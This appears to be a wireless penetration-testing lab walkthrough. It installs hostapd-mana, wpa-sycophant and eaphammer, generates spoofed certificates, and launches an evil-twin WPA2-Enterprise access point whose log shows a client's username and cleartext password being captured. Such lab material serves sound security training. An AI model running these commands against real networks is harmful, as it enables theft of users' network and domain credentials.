Reference and credit: https://w1f1.net/
Tools:
screen
Linux screen is a command-line utility that allows you to manage multiple terminal sessions within a single window. It is particularly useful when you need to keep long-running processes or sessions active, even if you disconnect from the server or close the terminal window.
└─$ sudo apt-get install screen
[sudo] password for lab:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Suggested packages:
byobu | screenie | iselect
The following packages will be upgraded:
screen
└─$ sudo apt-get install hostapd-mana
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
hostapd-mana
0 upgraded, 1 newly installed, 0 to remove and 1756 not upgraded.
Need to get 475 kB of archives.
After this operation, 1,335 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali kali-rolling/main amd64 hostapd-mana amd64 2.6.5+git20200121-0kali5 [475 kB]
Fetched 475 kB in 1s (428 kB/s)
Selecting previously unselected package hostapd-mana.
(Reading database ... 335599 files and directories currently installed.)
Preparing to unpack .../hostapd-mana_2.6.5+git20200121-0kali5_amd64.deb ...
Unpacking hostapd-mana (2.6.5+git20200121-0kali5) ...
Setting up hostapd-mana (2.6.5+git20200121-0kali5) ...
Warning: No -copy_extensions given; ignoring any extensions in the request
Generating DH parameters, 2048 bit long safe prime
...................................+...................................................
apt-get --yes install build-essential pkg-config git libnl-genl-3-dev libssl-dev
git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana
make -C hostapd
└─$ sudo apt install wpa-sycophant
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
wpa-sycophant
0 upgraded, 1 newly installed, 0 to remove and 1756 not upgraded.
Need to get 324 kB of archives.
After this operation, 887 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali kali-rolling/main amd64 wpa-sycophant amd64 1.0+git20210103-0kali3 [324 kB]
Fetched 324 kB in 11s (30.2 kB/s)
Selecting previously unselected package wpa-sycophant.
(Reading database ... 335611 files and directories currently installed.)
Preparing to unpack .../wpa-sycophant_1.0+git20210103-0kali3_amd64.deb ...
Unpacking wpa-sycophant (1.0+git20210103-0kali3) ...
Setting up wpa-sycophant (1.0+git20210103-0kali3) ...
Processing triggers for kali-menu (2022.3.1) ...
└─$ sudo apt-cache search eaphammer
eaphammer - toolkit for targeted evil twin attacks against WPA2-Enterprise networks
eaphammer-dbgsym - debug symbols for eaphammer
└─$ sudo apt-get install eaphammer
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
libcfitsio9 libgdal31 libllvm11 libpoppler118 libpython3.10-dev libtbb12 libtbbmalloc2 llvm-11 llvm-11-linker-tools llvm-11-runtime python3.10-dev
Use 'sudo apt autoremove' to remove them.
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup
Error message while executing ./eaphammer
└─$ ./eaphammer --cert-wizard
/usr/bin/env: ‘python3.8’: No such file or directory
└─$ python3
Completing external command
python python3 python3.10-config python3-commonmark python3-pasteurize python-faraday
python2 python3.9 python3.11 python3-config python3-qr
python2.7 python3.10 python3.11-config python3-futurize python-dotenv
Edit the eaphammer file and update 3.8 to the respective python version
nano eaphammer
Testing eaphammer
└─$ sudo ./eaphammer
.__
____ _____ ______ | |__ _____ _____ _____ ___________
_/ __ \\__ \ \____ \| | \\__ \ / \ / \_/ __ \_ __ \
\ ___/ / __ \| |_> > Y \/ __ \| Y Y \ Y Y \ ___/| | \/
\___ >____ / __/|___| (____ /__|_| /__|_| /\___ >__|
\/ \/|__| \/ \/ \/ \/ \/
A nice shiny new access point.
Version: 1.13.5
Codename: Power Overwhelming
Author: @s0lst1c3
Contact: gabriel<<at>>solstice(doT)sh
usage: eaphammer [-h] [--cert-wizard [{create,import,interactive,list,dh}] |
--list-templates | --create-template | --delete-template |
--bootstrap | --creds | --pmkid | --eap-spray |
--hostile-portal | --captive-portal-server-only |
--captive-portal] [--debug] [--lhost LHOST] [-i INTERFACE]
[-e ESSID] [-b BSSID] [-c CHANNEL] [--hw-mode HW_MODE]
[--cloaking {none,full,zeroes}]
[--auth {open,wpa-psk,wpa-eap,owe,owe-transition,owe-psk}]
[--pmf {disable,enable,require}] [--karma]
[--mac-whitelist MAC_WHITELIST]
[--mac-blacklist MAC_BLACKLIST]
[--ssid-whitelist SSID_WHITELIST]
[--ssid-blacklist SSID_BLACKLIST] [--loud] [--known-beacons]
[--known-ssids-file KNOWN_SSIDS_FILE]
[--known-ssids KNOWN_SSIDS [KNOWN_SSIDS ...]]
[--channel-width MGhz] [--wpa-passphrase WPA_PASSPHRASE]
[--capture-wpa-handshakes {yes,no}]
[--psk-capture-file PSK_CAPTURE_FILE]
[--auth-alg {shared,open,both}] [--wpa-version {1,2}]
[--transition-bssid OWE_TRANSITION_BSSID]
[--transition-ssid OWE_TRANSITION_SSID] [--autocrack]
[--negotiate {balanced,speed,weakest,gtc-downgrade,manual}]
[--remote-cracking-rig server:port] [--wordlist WORDLIST]
[--name NAME] [--description DESCRIPTION] [--author AUTHOR]
[--add-download-form] [--dl-form-message DL_FORM_MESSAGE]
[--lport LPORT] [--payload PAYLOAD]
[--portal-template PORTAL_USER_TEMPLATE] [--pivot]
[-I iface_n [iface_n ...]] [--user-list USER_LIST]
[--password PASSWORD]
[!] Please specify a valid PHY interface using the --interface flag
[!] Use -h or --help to display a list of basic options.
[!] Use -hh or --advanced-help to display full list of extended options.
# generate certificates
└─$ sudo ./eaphammer --cert-wizard
[sudo] password for lab:
.__
____ _____ ______ | |__ _____ _____ _____ ___________
_/ __ \\__ \ \____ \| | \\__ \ / \ / \_/ __ \_ __ \
\ ___/ / __ \| |_> > Y \/ __ \| Y Y \ Y Y \ ___/| | \/
\___ >____ / __/|___| (____ /__|_| /__|_| /\___ >__|
\/ \/|__| \/ \/ \/ \/ \/
A nice shiny new access point.
Version: 1.13.5
Codename: Power Overwhelming
Author: @s0lst1c3
Contact: gabriel<<at>>solstice(doT)sh
[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Please enter two letter country code for certs (i.e. US, FR)
: US
[*] Please enter state or province for certs (i.e. Ontario, New Jersey)
: New York
[*] Please enter locale for certs (i.e. London, Hong Kong)
: New York City
[*] Please enter organization for certs (i.e. Evil Corp)
: Secure Wireless
[*] Please enter org unit for certs (i.e. Hooman Resource Says)
: Network Security
[*] Please enter email for certs (i.e. cyberz@h4x0r.lulz)
: networksecurity@securewireless.com
[*] Please enter common name (CN) for certs.
: wirelesssecurity.securewireless.com
[CW] Creating CA cert and key pair...
[CW] Complete!
[CW] Writing CA cert and key pair to disk...
[CW] New CA cert and private key written to: /home/lab/wirelesspentestlabs/eaphammer/certs/ca/wirelesssecurity.securewireless.com.pem
[CW] Complete!
[CW] Creating server private key...
[CW] Complete!
[CW] Using server private key to create CSR...
[CW] Complete!
[CW] Creating server cert using CSR and signing it with CA key...
[CW] Complete!
[CW] Writing server cert and key pair to disk...
[CW] Complete!
[CW] Activating full certificate chain...
[CW] Complete!
# launch attack
./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid SecureWireless
└─$ sudo ./eaphammer -i wlan3 --channel 36 --auth wpa-eap --essid SecureWireless
.__
____ _____ ______ | |__ _____ _____ _____ ___________
_/ __ \\__ \ \____ \| | \\__ \ / \ / \_/ __ \_ __ \
\ ___/ / __ \| |_> > Y \/ __ \| Y Y \ Y Y \ ___/| | \/
\___ >____ / __/|___| (____ /__|_| /__|_| /\___ >__|
\/ \/|__| \/ \/ \/ \/ \/
A nice shiny new access point.
Version: 1.13.5
Codename: Power Overwhelming
Author: @s0lst1c3
Contact: gabriel<<at>>solstice(doT)sh
[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Saving current iptables configuration...
[*] Reticulating radio frequency splines...
[*] Using nmcli to tell NetworkManager not to manage wlan3...
100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:01<00:00, 1.00s/it]
[*] Success: wlan3 no longer controlled by NetworkManager.
[!] The hw_mode specified in hostapd.ini is invalid for the selected channel (g, 36)
[!] Falling back to hw_mode: a
[*] WPA handshakes will be saved to /home/lab/wirelesspentestlabs/eaphammer/loot/wpa_handshake_capture-2023-04-03-17-57-53-n1kX7WERTUXUybmGSw3AP2gctqHnj2p9.hccapx
[hostapd] AP starting...
Configuration file: /home/lab/wirelesspentestlabs/eaphammer/tmp/hostapd-2023-04-03-17-57-53-GwIlnhXNL80yuTZjA0uzjBT5Myd3hFAI.conf
wlan3: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan3 with hwaddr 00:11:22:33:44:00 and ssid "SecureWireless"
wlan3: interface state COUNTRY_UPDATE->ENABLED
wlan3: AP-ENABLED
Press enter to quit...
wlan3: STA de:91:11:ce:b5:77 IEEE 802.11: associated
wlan3: CTRL-EVENT-EAP-STARTED de:91:11:ce:b5:77
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
GTC: Mon Apr 3 17:58:46 2023
username: user1
password: Iusedmydomaincreds
wlan3: CTRL-EVENT-EAP-FAILURE de:91:11:ce:b5:77
wlan3: STA de:91:11:ce:b5:77 IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan3: STA de:91:11:ce:b5:77 IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan3: STA de:91:11:ce:b5:77 IEEE 802.11: disassociated
[hostapd] Terminating event loop...
[hostapd] Event loop terminated.
[hostapd] Hostapd worker still running... waiting for it to join.
wlan3: interface state ENABLED->DISABLED
wlan3: AP-DISABLED
wlan3: CTRL-EVENT-TERMINATING
nl80211: deinit ifname=wlan3 disabled_11b_rates=0
[hostapd] Worker joined.
[hostapd] AP disabled.